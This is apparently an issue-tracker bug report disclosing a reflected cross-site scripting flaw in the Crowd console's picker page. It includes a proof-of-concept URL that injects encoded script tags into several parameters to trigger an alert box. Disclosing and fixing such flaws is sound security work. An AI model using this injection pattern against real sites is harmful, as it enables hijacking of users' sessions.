Cross Site Scripting vulnerabilities in Pickers

XMLWordPrintable

      Currently, the confluence picker does not sanitize the input ( <crowd-url>/crowd/console/secure/pickers/displayPicker.action).

      Proof of concept.

      1. Access the following URL in your browser with javascript enabled. Replace the <crowd-url> with your crowd URL.

        <crowd-url>/crowd/console/secure/pickers/displayPicker.action?searchURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&actionURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&actionName=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&initialMessage=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&finalURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E

      2. You will see the following alert:

        1. sample.png
          sample.png
          3 kB

            Assignee:
            joe
            Reporter:
            Jing Hwa Cheok (Inactive)
            Votes:
            1 Vote for this issue
            Watchers:
            5 Start watching this issue

              Created:
              Updated:
              Resolved: